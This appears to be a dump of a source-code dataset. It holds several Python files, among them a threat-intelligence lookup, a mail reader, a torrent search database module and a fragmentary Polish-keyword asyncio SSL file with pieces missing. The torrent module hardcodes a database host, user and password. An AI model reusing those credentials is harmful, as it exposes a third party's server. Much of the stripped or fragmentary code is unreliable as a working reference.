hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
513ef3edbae8277d962b74a9d9c209ea7791d7c5 | 2,540 | py | Python | fn_apility/fn_apility/components/function_apility.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 65 | 2017-12-04T13:58:32.000Z | 2022-03-24T18:33:17.000Z | fn_apility/fn_apility/components/function_apility.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 48 | 2018-03-02T19:17:14.000Z | 2022-03-09T22:00:38.000Z | fn_apility/fn_apility/components/function_apility.py | nickpartner-goahead/resilient-community-apps | 097c0dbefddbd221b31149d82af9809420498134 | [
"MIT"
] | 95 | 2018-01-11T16:23:39.000Z | 2022-03-21T11:34:29.000Z | # (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import logging
from resilient_circuits import ResilientComponent, function, handler, StatusMessage, FunctionResult, FunctionError
import fn_apility.util.selftest as selftest
import requests
from fn_apility.lib.resilient_common import api_url
class FunctionComponent(ResilientComponent):
"""Component that implements Resilient function 'fn_apility"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(FunctionComponent, self).__init__(opts)
self.options = opts.get("fn_apility", {})
selftest.selftest_function(opts)
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get("fn_apility", {})
@function("fn_apility")
def _fn_apility_function(self, event, *args, **kwargs):
"""Function: Apility's anti-abuse API helps you know immediately if a user’s IP address, domain or email address is blacklisted so you can decide whether to block it or not."""
try:
# Get the function parameters:
apility_lookup_type = self.get_select_param(kwargs.get("apility_lookup_type")) # select, values: "Email", "IP Address", "Domain"
apility_lookup_value = kwargs.get("apility_lookup_value") # text
log = logging.getLogger(__name__)
log.info("apility_lookup_type: %s", apility_lookup_type)
log.info("apility_lookup_value: %s", apility_lookup_value)
HEADERS = {'content-type': 'application/json', 'X-Auth-Token': self.options['api_token']}
api = api_url(apility_lookup_type)
url = '/'.join((self.options['url'], api, apility_lookup_value))
response = requests.get(url, headers=HEADERS)
if(response.status_code == 200):
res = response.json()
res['query'] = apility_lookup_value
else:
msg = "Some error occured while retrieving the information from Apility.io with status code: {}"
raise ValueError(msg.format(response.status_code))
results = {
"value": res
}
# Produce a FunctionResult with the results
yield FunctionResult(results)
except Exception:
yield FunctionError()
| 41.639344 | 184 | 0.652362 | # (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
"""Function implementation"""
import logging
from resilient_circuits import ResilientComponent, function, handler, StatusMessage, FunctionResult, FunctionError
import fn_apility.util.selftest as selftest
import requests
from fn_apility.lib.resilient_common import api_url
class FunctionComponent(ResilientComponent):
"""Component that implements Resilient function 'fn_apility"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(FunctionComponent, self).__init__(opts)
self.options = opts.get("fn_apility", {})
selftest.selftest_function(opts)
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get("fn_apility", {})
@function("fn_apility")
def _fn_apility_function(self, event, *args, **kwargs):
"""Function: Apility's anti-abuse API helps you know immediately if a user’s IP address, domain or email address is blacklisted so you can decide whether to block it or not."""
try:
# Get the function parameters:
apility_lookup_type = self.get_select_param(kwargs.get("apility_lookup_type")) # select, values: "Email", "IP Address", "Domain"
apility_lookup_value = kwargs.get("apility_lookup_value") # text
log = logging.getLogger(__name__)
log.info("apility_lookup_type: %s", apility_lookup_type)
log.info("apility_lookup_value: %s", apility_lookup_value)
HEADERS = {'content-type': 'application/json', 'X-Auth-Token': self.options['api_token']}
api = api_url(apility_lookup_type)
url = '/'.join((self.options['url'], api, apility_lookup_value))
response = requests.get(url, headers=HEADERS)
if(response.status_code == 200):
res = response.json()
res['query'] = apility_lookup_value
else:
msg = "Some error occured while retrieving the information from Apility.io with status code: {}"
raise ValueError(msg.format(response.status_code))
results = {
"value": res
}
# Produce a FunctionResult with the results
yield FunctionResult(results)
except Exception:
yield FunctionError()
| 0 | 0 | 0 |
d7078b37dd4fb5b2784ec91f80868383739be167 | 183 | py | Python | tests/test_layers/test_2p5d/checks_2p5d/common.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | 1 | 2021-11-02T03:13:36.000Z | 2021-11-02T03:13:36.000Z | tests/test_layers/test_2p5d/checks_2p5d/common.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | tests/test_layers/test_2p5d/checks_2p5d/common.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | import torch
TESSERACT_DIM = 2
TESSERACT_DEP = 2
BATCH_SIZE = 8
SEQ_LENGTH = 8
HIDDEN_SIZE = 8
| 15.25 | 61 | 0.699454 | import torch
TESSERACT_DIM = 2
TESSERACT_DEP = 2
BATCH_SIZE = 8
SEQ_LENGTH = 8
HIDDEN_SIZE = 8
def check_equal(A, B):
assert torch.allclose(A, B, rtol=1e-5, atol=1e-2) == True
| 63 | 0 | 23 |
4c231590b75724b5d628f6a35085f505a321fb9d | 1,511 | py | Python | django_postgres_extensions/models/sql/subqueries.py | parth-verma/django3_postgres_extensions | 72045b72d56debeb8c480fad52871f486edfe021 | [
"BSD-3-Clause"
] | null | null | null | django_postgres_extensions/models/sql/subqueries.py | parth-verma/django3_postgres_extensions | 72045b72d56debeb8c480fad52871f486edfe021 | [
"BSD-3-Clause"
] | null | null | null | django_postgres_extensions/models/sql/subqueries.py | parth-verma/django3_postgres_extensions | 72045b72d56debeb8c480fad52871f486edfe021 | [
"BSD-3-Clause"
] | null | null | null | from django.db.models.sql.subqueries import UpdateQuery as BaseUpdateQuery
from django.core.exceptions import FieldError | 45.787879 | 94 | 0.563203 | from django.db.models.sql.subqueries import UpdateQuery as BaseUpdateQuery
from django.core.exceptions import FieldError
class UpdateQuery(BaseUpdateQuery):
def add_update_values(self, values):
"""
Convert a dictionary of field name to value mappings into an update
query. This is the entry point for the public update() method on
querysets.
"""
values_seq = []
for name, val in values.items():
if '__' in name:
indexes = name.split('__')
field_name = indexes.pop(0)
field = self.get_meta().get_field(field_name)
val = field.get_update_type(indexes, val)
model = field.model
else:
field = self.get_meta().get_field(name)
direct = not (field.auto_created and not field.concrete) or not field.concrete
model = field.model._meta.concrete_model
if not direct or (field.is_relation and field.many_to_many):
raise FieldError(
'Cannot update model field %r (only non-relations and '
'foreign keys permitted).' % field
)
else:
if model is not self.get_meta().model:
self.add_related_update(model, field, val)
continue
values_seq.append((field, model, val))
return self.add_update_fields(values_seq) | 0 | 1,368 | 23 |
66eac9cb899e469fef458d2d4c796284f67a7dc6 | 1,130 | py | Python | larcv/app/arxiv/mac/pyrgb/rgb_cv2/cv2gausblur.py | mmajewsk/larcv2 | 9ee74e42b293d547d3a8510fa2139b2d4ccf6b89 | [
"MIT"
] | 14 | 2017-10-19T15:08:29.000Z | 2021-03-31T21:21:07.000Z | larcv/app/arxiv/mac/pyrgb/rgb_cv2/cv2gausblur.py | mmajewsk/larcv2 | 9ee74e42b293d547d3a8510fa2139b2d4ccf6b89 | [
"MIT"
] | 32 | 2017-10-25T22:54:06.000Z | 2019-10-01T13:57:15.000Z | larcv/app/arxiv/mac/pyrgb/rgb_cv2/cv2gausblur.py | mmajewsk/larcv2 | 9ee74e42b293d547d3a8510fa2139b2d4ccf6b89 | [
"MIT"
] | 16 | 2017-12-07T12:04:40.000Z | 2021-11-15T00:53:31.000Z | from cv2selection import CV2Selection
from cv2selection import QtGui
import cv2
| 31.388889 | 81 | 0.625664 | from cv2selection import CV2Selection
from cv2selection import QtGui
import cv2
class CV2GausBlur(CV2Selection):
def __init__(self):
super(CV2GausBlur,self).__init__()
self.name = "CV2GausBlur"
# default options
self.options['ksize'] = (5,5)
self.options['sigmaX'] = 1.0
self.options['sigmaY'] = 1.0
self.types['ksize'] = tuple
self.types['sigmaX'] = float
self.types['sigmaY'] = float
self.widgets['ksize'] = (QtGui.QLabel("Size"), QtGui.QLineEdit())
self.widgets['sigmaX'] = (QtGui.QLabel("Sigma X"), QtGui.QLineEdit())
self.widgets['sigmaY'] = (QtGui.QLabel("Sigma Y"), QtGui.QLineEdit())
for key,value in self.widgets.iteritems():
value[1].setText(str(self.options[key]))
def __description__(self):
return "No description provided!"
def __parsewidgets__(self):
for key,val in self.widgets.iteritems():
self.options[key] = self.str2data(self.types[key],str(val[1].text()))
def __implement__(self,image):
return cv2.GaussianBlur(image,**self.options)
| 403 | 531 | 116 |
00b683c64c7dd7c2dbeb53d7fb96c9be873918a1 | 644 | py | Python | Arbie/Actions/__init__.py | owodunni/Arbie | abc209a9f209bcd1f61e3b0209ec80b13f7b8f8b | [
"MIT"
] | 12 | 2021-03-17T10:21:49.000Z | 2022-03-06T04:26:39.000Z | Arbie/Actions/__init__.py | owodunni/arbie | abc209a9f209bcd1f61e3b0209ec80b13f7b8f8b | [
"MIT"
] | 45 | 2020-07-22T19:33:04.000Z | 2022-03-04T11:35:41.000Z | Arbie/Actions/__init__.py | owodunni/Arbie | abc209a9f209bcd1f61e3b0209ec80b13f7b8f8b | [
"MIT"
] | 3 | 2020-08-13T12:25:09.000Z | 2021-03-17T10:21:51.000Z | """Actions are used for building complex interactions with smart contracts."""
from Arbie.Actions.action import Action, Store # noqa: F401
from Arbie.Actions.action_tree import ActionTree # noqa: F401
from Arbie.Actions.arbitrage import Arbitrage # noqa:F401
from Arbie.Actions.path_finder import PathFinder # noqa: F401
from Arbie.Actions.pool_finder import PoolFinder # noqa: F401
from Arbie.Actions.pool_updater import PoolUpdater # noqa: F401
from Arbie.Actions.redis_state import RedisState # noqa: F401
from Arbie.Actions.trader import SetUpTrader, Trader # noqa: F401
from Arbie.Actions.whitelist import Whitelist # noqa: F401
| 53.666667 | 78 | 0.799689 | """Actions are used for building complex interactions with smart contracts."""
from Arbie.Actions.action import Action, Store # noqa: F401
from Arbie.Actions.action_tree import ActionTree # noqa: F401
from Arbie.Actions.arbitrage import Arbitrage # noqa:F401
from Arbie.Actions.path_finder import PathFinder # noqa: F401
from Arbie.Actions.pool_finder import PoolFinder # noqa: F401
from Arbie.Actions.pool_updater import PoolUpdater # noqa: F401
from Arbie.Actions.redis_state import RedisState # noqa: F401
from Arbie.Actions.trader import SetUpTrader, Trader # noqa: F401
from Arbie.Actions.whitelist import Whitelist # noqa: F401
| 0 | 0 | 0 |
52ff3a2f0415ac3223a20fa695330480f46fc21b | 1,503 | py | Python | mail/mail.py | MiracleWong/PythonBasic | cb8ec59dc646842b41966ea4ea4b1ee66a342eee | [
"MIT"
] | null | null | null | mail/mail.py | MiracleWong/PythonBasic | cb8ec59dc646842b41966ea4ea4b1ee66a342eee | [
"MIT"
] | null | null | null | mail/mail.py | MiracleWong/PythonBasic | cb8ec59dc646842b41966ea4ea4b1ee66a342eee | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import email
from email.header import decode_header
# 只读取收件箱中的未读邮件 | 35.785714 | 73 | 0.50499 | # -*- coding: utf-8 -*-
import email
from email.header import decode_header
# 只读取收件箱中的未读邮件
def get_mail(client):
mail_list = []
resp, data = client.search(None, "UNSEEN")
if data:
for num in data[0].split():
typ, data = client.fetch(int(num), "(RFC822)")
msg = data[0][1]
msg = email.message_from_string(msg)
subject_info = msg.get("Subject")
subject = decode_header(subject_info)[0][0]
from_info = email.utils.parseaddr(msg.get("From"))
if len(from_info) == 2:
user = email.header.decode_header(from_info[0])[0][0]
from_addr = user + "<" + from_info[1] + ">"
else:
from_addr = from_info
date = msg.get("Date")
content = None
for i in msg.walk():
content_type = i.get_content_type()
content_charset = i.get_charsets()[0]
if not i.is_multipart():
# 在这里只读取文本信息,可以修改为 content_type == "text/html",即超文本处理
if content_type == "text/plain":
content = i.get_payload(decode=True)
if content_charset:
content=content.decode(content_charset)
mail = {"From":from_addr,
"Subject":subject,
"Date":date,
"Content":content}
mail_list.append(mail)
return mail_list | 1,433 | 0 | 22 |
70fe1de5df6c36d8235904a90a0a5de3ebf7a09a | 11,079 | py | Python | util/database.py | ssunqf/mana | eff753f83b2129e3537dc3cee3952cb61f55fea0 | [
"BSD-3-Clause"
] | null | null | null | util/database.py | ssunqf/mana | eff753f83b2129e3537dc3cee3952cb61f55fea0 | [
"BSD-3-Clause"
] | null | null | null | util/database.py | ssunqf/mana | eff753f83b2129e3537dc3cee3952cb61f55fea0 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import asyncio
import json
import logging
import re
from typing import List, Tuple, Dict
from datetime import datetime
from tqdm import tqdm
from parser.nsfw import detect_nsfw
import asyncpg
from util.categories import guess_metainfo
from parser.search import make_tsvector, make_tsquery
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except:
pass
if __name__ == '__main__':
loop = asyncio.get_event_loop()
db_client = Torrent('207.148.124.42', loop=loop)
loop.run_until_complete(db_client.update_all())
# loop.run_until_complete(db_client.word_count('char.dic'))
| 38.873684 | 127 | 0.476668 | #!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import asyncio
import json
import logging
import re
from typing import List, Tuple, Dict
from datetime import datetime
from tqdm import tqdm
from parser.nsfw import detect_nsfw
import asyncpg
from util.categories import guess_metainfo
from parser.search import make_tsvector, make_tsquery
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except:
pass
class Torrent:
def __init__(self, host='localhost', loop=None):
self.loop = loop if loop else asyncio.get_event_loop()
self.pool = self.loop.run_until_complete(
asyncpg.create_pool(database='btsearch',
host=host,
user='sunqf',
password='840422',
loop=self.loop))
def __exit__(self, exc_type, exc_val, exc_tb):
self.pool.colse()
async def create_table(self):
async with self.pool.acquire() as conn:
# await conn.execute('''DROP TABLE torrent''')
await conn.execute(
'''
CREATE TABLE torrent (
infohash varchar(40) PRIMARY KEY,
metainfo JSONB,
category TEXT,
keyword_ts TSVECTOR,
seeders INT,
completed INT,
leechers INT)
''')
async def save_torrent(self, data: List[Tuple[str, Dict]]):
try:
async with self.pool.acquire() as conn:
async with conn.transaction():
await conn.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
await conn.executemany(
'''
INSERT INTO torrent (infohash, metainfo, category, keyword_ts, adult)
VALUES ($1, $2, $3, $4::tsvector, $5)
''',
[(infohash.upper(), metainfo, guess_metainfo(metainfo), make_tsvector(metainfo), detect_nsfw(metainfo))
for infohash, metainfo in data])
except Exception as e:
logging.warning(str(e))
async def update_status(self, data: List[(Tuple[str, int, int, int])]):
try:
async with self.pool.acquire() as conn:
async with conn.transaction():
now = datetime.utcnow()
await conn.executemany(
'''
UPDATE torrent
SET seeders=$2, completed=$3, leechers=$4, update_time=$5
WHERE infohash = $1
''',
[(infohash.upper(), seeders, completed, leechers, now)
for infohash, seeders, completed, leechers, in data]
)
except Exception as e:
logging.warning(str(e))
async def fetch_infohash(self, queue: asyncio.Queue):
try:
async with self.pool.acquire() as conn:
async with conn.transaction():
async for row in conn.cursor('''SELECT infohash FROM torrent'''):
await queue.put(row['infohash'])
await queue.put(None)
except Exception as e:
logging.warning(e)
async def foreach(self, table_name, column_name, alias_name):
async with self.pool.acquire() as conn:
async with conn.transaction():
await conn.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
return [row[alias_name] async for row in conn.fetch(
'''SELECT %s as %s FROM %s''' % (column_name, alias_name, table_name))]
async def batch(self, offset, limit):
async with self.pool.acquire() as conn:
async with conn.transaction():
await conn.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
return await conn.fetch(f'''
SELECT infohash, metainfo FROM torrent OFFSET {offset} LIMIT {limit}
''')
async def get_by_infohash(self, infohash):
async with self.pool.acquire() as conn:
async with conn.transaction():
await conn.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
return dict(await conn.fetchrow(
'''
SELECT infohash, metainfo, category, seeders, completed, leechers, update_time
FROM torrent
WHERE infohash = $1
''',
infohash.upper()))
async def search(self, query, offset=0, limit=20, **kwargs):
async with self.pool.acquire() as conn:
async with conn.transaction():
await conn.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
query = make_tsquery(query)
conditions = ' and '.join([('%s=%d' if isinstance(v, int) else'%s=\'%s\'') % (k, v)
for k, v in kwargs.items()])
cmd = '''
SELECT *, COUNT(*) OVER() AS total
FROM (
SELECT *, keyword_ts <=> \'%s\'::tsquery AS rank
FROM torrent
WHERE keyword_ts @@ \'%s\'::tsquery %s
ORDER BY keyword_ts <=> \'%s\'::tsquery
LIMIT 1000
) AS matched
ORDER BY rank, seeders DESC
LIMIT %d OFFSET %d
''' % (query, query, 'and ' + conditions if len(kwargs) > 0 else '', query, limit, offset)
return [dict(row) for row in await conn.fetch(cmd)]
async def update(self):
tq = tqdm(desc='update')
while True:
try:
async with self.pool.acquire() as reader:
async with reader.transaction():
await reader.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
cmd = f'''
SELECT infohash, metainfo FROM torrent
ORDER BY infohash
LIMIT 200 OFFSET {tq.n}
'''
buffer = [(row['infohash'], make_tsvector(row['metainfo']), detect_nsfw(row['metainfo']))
for row in await reader.fetch(cmd)]
if len(buffer) == 0:
break
async with self.pool.acquire() as writer:
async with writer.transaction():
await writer.executemany(
'''UPDATE torrent SET keyword_ts=$2, adult=$3 WHERE infohash = $1''',
buffer)
tq.update(len(buffer))
except Exception as e:
raise e
async def fetch(self, queue: asyncio.Queue):
try:
async with self.pool.acquire() as reader:
async with reader.transaction(isolation='serializable', readonly=True):
await reader.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
cmd = f'''
SELECT infohash, metainfo
FROM torrent
WHERE jsonb_array_length(metainfo->'files') > 1 and metainfo::text ~ '(論壇文宣|宣传(文件)?)/'
'''
async for row in reader.cursor(cmd, prefetch=50):
await queue.put(row)
await queue.put(None)
except Exception as e:
raise e
async def consumer(self, readq: asyncio.Queue, writeq: asyncio.Queue):
tq = tqdm(desc='process')
while True:
item = await readq.get()
if item is None:
await writeq.put(None)
break
metainfo = item['metainfo']
metainfo['files'] = [file for file in metainfo['files']
if not re.match(r'(論壇文宣/|_____padding_file_|宣传(文本)?/)', file['path'])]
await writeq.put((item['infohash'], metainfo, make_tsvector(metainfo)))
del item
tq.update()
async def output(self, writeq: asyncio.Queue, batch_size=50):
while True:
batch = []
while len(batch) < batch_size:
last = await writeq.get()
if last is None:
break
batch.append(last)
try:
async with self.pool.acquire() as writer:
async with writer.transaction():
await writer.set_type_codec(
'jsonb',
encoder=lambda d: json.dumps(d, ensure_ascii=False),
decoder=json.loads,
schema='pg_catalog'
)
await writer.executemany(
'''UPDATE torrent SET metainfo=$2, keyword_ts=$3 WHERE infohash = $1''',
batch)
except Exception as e:
logging.warning(e)
logging.warning([i[0] for i in batch])
del batch
async def update_all(self):
readq, writeq = asyncio.Queue(maxsize=1000), asyncio.Queue(maxsize=1000)
await asyncio.gather(self.fetch(readq), self.consumer(readq, writeq), self.output(writeq))
if __name__ == '__main__':
loop = asyncio.get_event_loop()
db_client = Torrent('207.148.124.42', loop=loop)
loop.run_until_complete(db_client.update_all())
# loop.run_until_complete(db_client.word_count('char.dic'))
| 10,012 | -7 | 427 |
4550d03f499be9eae5048493c3d980accb44af5d | 25,804 | py | Python | Lib/asyncio/sslproto.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
] | 1 | 2018-06-21T18:21:24.000Z | 2018-06-21T18:21:24.000Z | Lib/asyncio/sslproto.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
] | null | null | null | Lib/asyncio/sslproto.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
] | null | null | null | zaimportuj collections
zaimportuj warnings
spróbuj:
zaimportuj ssl
wyjąwszy ImportError: # pragma: no cover
ssl = Nic
z . zaimportuj compat
z . zaimportuj protocols
z . zaimportuj transports
z .log zaimportuj logger
inaczej:
# Fallback dla Python 3.3.
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.options |= ssl.OP_NO_SSLv3
sslcontext.set_default_verify_paths()
sslcontext.verify_mode = ssl.CERT_REQUIRED
zwróć sslcontext
def _is_sslproto_available():
zwróć hasattr(ssl, "MemoryBIO")
# States of an _SSLPipe.
_UNWRAPPED = "UNWRAPPED"
_DO_HANDSHAKE = "DO_HANDSHAKE"
_WRAPPED = "WRAPPED"
_SHUTDOWN = "SHUTDOWN"
klasa _SSLPipe(object):
"""An SSL "Pipe".
An SSL pipe allows you to communicate przy an SSL/TLS protocol instance
through memory buffers. It can be used to implement a security layer dla an
existing connection where you don't have access to the connection's file
descriptor, albo dla some reason you don't want to use it.
An SSL pipe can be w "wrapped" oraz "unwrapped" mode. In unwrapped mode,
data jest dalejed through untransformed. In wrapped mode, application level
data jest encrypted to SSL record level data oraz vice versa. The SSL record
level jest the lowest level w the SSL protocol suite oraz jest what travels
as-is over the wire.
An SslPipe initially jest w "unwrapped" mode. To start SSL, call
do_handshake(). To shutdown SSL again, call unwrap().
"""
max_size = 256 * 1024 # Buffer size dalejed to read()
def __init__(self, context, server_side, server_hostname=Nic):
"""
The *context* argument specifies the ssl.SSLContext to use.
The *server_side* argument indicates whether this jest a server side albo
client side transport.
The optional *server_hostname* argument can be used to specify the
hostname you are connecting to. You may only specify this parameter if
the _ssl module supports Server Name Indication (SNI).
"""
self._context = context
self._server_side = server_side
self._server_hostname = server_hostname
self._state = _UNWRAPPED
self._incoming = ssl.MemoryBIO()
self._outgoing = ssl.MemoryBIO()
self._sslobj = Nic
self._need_ssldata = Nieprawda
self._handshake_cb = Nic
self._shutdown_cb = Nic
@property
def context(self):
"""The SSL context dalejed to the constructor."""
zwróć self._context
@property
def ssl_object(self):
"""The internal ssl.SSLObject instance.
Return Nic jeżeli the pipe jest nie wrapped.
"""
zwróć self._sslobj
@property
def need_ssldata(self):
"""Whether more record level data jest needed to complete a handshake
that jest currently w progress."""
zwróć self._need_ssldata
@property
def wrapped(self):
"""
Whether a security layer jest currently w effect.
Return Nieprawda during handshake.
"""
zwróć self._state == _WRAPPED
self._sslobj = self._context.wrap_bio(
self._incoming, self._outgoing,
server_side=self._server_side,
server_hostname=self._server_hostname)
self._state = _DO_HANDSHAKE
self._handshake_cb = callback
ssldata, appdata = self.feed_ssldata(b'', only_handshake=Prawda)
assert len(appdata) == 0
zwróć ssldata
jeżeli self._state == _SHUTDOWN:
podnieś RuntimeError('shutdown w progress')
assert self._state w (_WRAPPED, _DO_HANDSHAKE)
self._state = _SHUTDOWN
self._shutdown_cb = callback
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] albo appdata == [b'']
zwróć ssldata
def feed_eof(self):
"""Send a potentially "ragged" EOF.
This method will podnieś an SSL_ERROR_EOF exception jeżeli the EOF jest
unexpected.
"""
self._incoming.write_eof()
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] albo appdata == [b'']
self._need_ssldata = Nieprawda
jeżeli data:
self._incoming.write(data)
ssldata = []
appdata = []
spróbuj:
jeżeli self._state == _DO_HANDSHAKE:
# Call do_handshake() until it doesn't podnieś anymore.
self._sslobj.do_handshake()
self._state = _WRAPPED
jeżeli self._handshake_cb:
self._handshake_cb(Nic)
jeżeli only_handshake:
zwróć (ssldata, appdata)
# Handshake done: execute the wrapped block
jeżeli self._state == _WRAPPED:
# Main state: read data z SSL until close_notify
dopóki Prawda:
chunk = self._sslobj.read(self.max_size)
appdata.append(chunk)
jeżeli nie chunk: # close_notify
przerwij
albo_inaczej self._state == _SHUTDOWN:
# Call shutdown() until it doesn't podnieś anymore.
self._sslobj.unwrap()
self._sslobj = Nic
self._state = _UNWRAPPED
jeżeli self._shutdown_cb:
self._shutdown_cb()
albo_inaczej self._state == _UNWRAPPED:
# Drain possible plaintext data after close_notify.
appdata.append(self._incoming.read())
wyjąwszy (ssl.SSLError, ssl.CertificateError) jako exc:
jeżeli getattr(exc, 'errno', Nic) nie w (
ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
jeżeli self._state == _DO_HANDSHAKE oraz self._handshake_cb:
self._handshake_cb(exc)
podnieś
self._need_ssldata = (exc.errno == ssl.SSL_ERROR_WANT_READ)
# Check dla record level data that needs to be sent back.
# Happens dla the initial handshake oraz renegotiations.
jeżeli self._outgoing.pending:
ssldata.append(self._outgoing.read())
zwróć (ssldata, appdata)
def feed_appdata(self, data, offset=0):
"""Feed plaintext data into the pipe.
Return an (ssldata, offset) tuple. The ssldata element jest a list of
buffers containing record level data that needs to be sent to the
remote SSL instance. The offset jest the number of plaintext bytes that
were processed, which may be less than the length of data.
NOTE: In case of short writes, this call MUST be retried przy the SAME
buffer dalejed into the *data* argument (i.e. the id() must be the
same). This jest an OpenSSL requirement. A further particularity jest that
a short write will always have offset == 0, because the _ssl module
does nie enable partial writes. And even though the offset jest zero,
there will still be encrypted data w ssldata.
"""
assert 0 <= offset <= len(data)
jeżeli self._state == _UNWRAPPED:
# dalej through data w unwrapped mode
jeżeli offset < len(data):
ssldata = [data[offset:]]
inaczej:
ssldata = []
zwróć (ssldata, len(data))
ssldata = []
view = memoryview(data)
dopóki Prawda:
self._need_ssldata = Nieprawda
spróbuj:
jeżeli offset < len(view):
offset += self._sslobj.write(view[offset:])
wyjąwszy ssl.SSLError jako exc:
# It jest nie allowed to call write() after unwrap() until the
# close_notify jest acknowledged. We zwróć the condition to the
# caller jako a short write.
jeżeli exc.reason == 'PROTOCOL_IS_SHUTDOWN':
exc.errno = ssl.SSL_ERROR_WANT_READ
jeżeli exc.errno nie w (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
podnieś
self._need_ssldata = (exc.errno == ssl.SSL_ERROR_WANT_READ)
# See jeżeli there's any record level data back dla us.
jeżeli self._outgoing.pending:
ssldata.append(self._outgoing.read())
jeżeli offset == len(view) albo self._need_ssldata:
przerwij
zwróć (ssldata, offset)
klasa _SSLProtocolTransport(transports._FlowControlMixin,
transports.Transport):
def get_extra_info(self, name, default=Nic):
"""Get optional transport information."""
zwróć self._ssl_protocol._get_extra_info(name, default)
def close(self):
"""Close the transport.
Buffered data will be flushed asynchronously. No more data
will be received. After all buffered data jest flushed, the
protocol's connection_lost() method will (eventually) called
przy Nic jako its argument.
"""
self._closed = Prawda
self._ssl_protocol._start_shutdown()
# On Python 3.3 oraz older, objects przy a destructor part of a reference
# cycle are never destroyed. It's nie more the case on Python 3.4 thanks
# to the PEP 442.
jeżeli compat.PY34:
def __del__(self):
jeżeli nie self._closed:
warnings.warn("unclosed transport %r" % self, ResourceWarning)
self.close()
def pause_reading(self):
"""Pause the receiving end.
No data will be dalejed to the protocol's data_received()
method until resume_reading() jest called.
"""
self._ssl_protocol._transport.pause_reading()
def resume_reading(self):
"""Resume the receiving end.
Data received will once again be dalejed to the protocol's
data_received() method.
"""
self._ssl_protocol._transport.resume_reading()
def set_write_buffer_limits(self, high=Nic, low=Nic):
"""Set the high- oraz low-water limits dla write flow control.
These two values control when to call the protocol's
pause_writing() oraz resume_writing() methods. If specified,
the low-water limit must be less than albo equal to the
high-water limit. Neither value can be negative.
The defaults are implementation-specific. If only the
high-water limit jest given, the low-water limit defaults to a
implementation-specific value less than albo equal to the
